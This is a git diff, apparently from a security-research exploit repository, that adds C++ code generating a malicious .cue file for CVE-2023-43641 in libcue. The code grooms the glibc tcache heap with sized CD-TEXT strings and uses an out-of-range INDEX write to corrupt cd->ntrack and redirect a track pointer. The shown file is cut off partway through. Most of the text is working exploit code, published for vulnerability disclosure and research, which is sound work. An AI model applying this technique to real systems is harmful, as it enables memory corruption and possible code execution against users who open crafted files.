+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + diff --git a/SecurityExploits/libcue/track_set_index_CVE-2023-43641/mkcue.cpp b/SecurityExploits/libcue/track_set_index_CVE-2023-43641/mkcue.cpp new file mode 100644 index 0000000..96f3558 --- /dev/null +++ b/SecurityExploits/libcue/track_set_index_CVE-2023-43641/mkcue.cpp @@ -0,0 +1,565 @@ +#include "utils.h" +#include +#include +#include +#include +#include +#include +#include +#include + +struct Track { + const char *title_; + const char *composer_; + const char *arranger_; + const char *performer_; + const char *songwriter_; + const char *genre_; + const char *message_; +}; + +const Track track_fengshui1 = { + "Heap Feng Shui: empty the tcache", + "Allocate a chunk from tcache index 2 ", + "Allocate a chunk from tcache index 4 ", + "Allocate a chunk from tcache index 6 " + " \n ", + "Allocate a chunk from tcache index 7 " + " \n ", + "Allocate a chunk from tcache index 11 " + " \n " + " \n ", + "The goal here is to ensure that all subsequent allocations come\nfrom a " + "large contiguous block of memory. This string allocates a chunk " + "from\ntcache index 13. Doing this 14 times guarantees that the tcache is " + "empty. ", +}; + +const Track track_fengshui2 = { + "Repeat Heap Feng Shui ", + " ", + " ", + " " + " \n ", + " " + " \n ", + " " + " \n " + " \n ", + " \n " + " \n " + " ", +}; + +const Track track_rickroll = { + "Never Gonna Give You Up ", + "Rick Astley ", + " ", + "\nWe're no strangers to love\nYou know the rules and so do I\n " + " ", + "\nA full commitment's what I'm thinking of\nYou wouldn't get this from " + "any other guy\n ", + "\nI just want to tell you how I'm feeling\nGotta make you understand\n " + " \n " + " ", + "\nNever gonna give you up, never gonna let you down\nNever gonna run " + "around and desert you\nNever gonna make you cry, never gonna say " + "goodbye\nNever gonna tell a lie and hurt you\n " + " "}; + +// Calculate the tcache index that will be used for `malloc(size)`. +size_t calc_tcache_index(size_t size) { + if (size < 0x9) { + return 0; + } + return (size - 0x9) / 0x10; +} + +static void write_cdtext(WriteBuf &buf, const size_t tidx, const char *item, + const char *str) { + // Confirm that the string is the correct length for the intended tcache + // index. + const size_t len = strlen(str); + const size_t idx = calc_tcache_index(len + 1); + if (idx != tidx) { + const char *problem = idx < tidx ? "short" : "long"; + fprintf(stderr, + "String is too %s for target tcache index %ld. Actual index: " + "%ld.\nString:\n%s\n", + problem, tidx, idx, str); + exit(EXIT_FAILURE); + } + + buf.write_string(item); + buf.write_string(" \""); + buf.write_string(str); + buf.write_string("\"\n"); +} + +static void set_index(WriteBuf &buf, int32_t i, uint32_t x) { + char str[256]; + snprintf(str, sizeof(str), "INDEX %u %u\n", (uint32_t)i, x); + buf.write_string(str); +} + +// Overwrite cd->ntrack, with the goal of writing a pointer +// to a track at the target address the next time that a new +// track is allocated. +static void set_cd_ntrack(WriteBuf &buf, size_t cd_ntrack_offset, + size_t track_offset, size_t target_offset) { + ptrdiff_t i = ((ptrdiff_t)(cd_ntrack_offset - track_offset) - 0x88) / 8; + ptrdiff_t x = ((ptrdiff_t)(target_offset - cd_ntrack_offset) - 0x8) / 8; + if (99 <= x) { + // To compensate for the adjustment that's made in cd_add_track. + x++; + } + set_index(buf, i, x); +} + +static void new_track(WriteBuf &buf, size_t &tracknum) { + char str[256]; + snprintf(str, sizeof(str), "TRACK %.3lu AUDIO\n", tracknum); + tracknum++; + buf.write_string(str); +} + +static void write_complete_track(WriteBuf &buf, size_t &tracknum, + const Track &track) { + new_track(buf, tracknum); + write_cdtext(buf, 1, "TITLE", track.title_); + write_cdtext(buf, 2, "COMPOSER", track.composer_); + write_cdtext(buf, 4, "ARRANGER", track.arranger_); + write_cdtext(buf, 6, 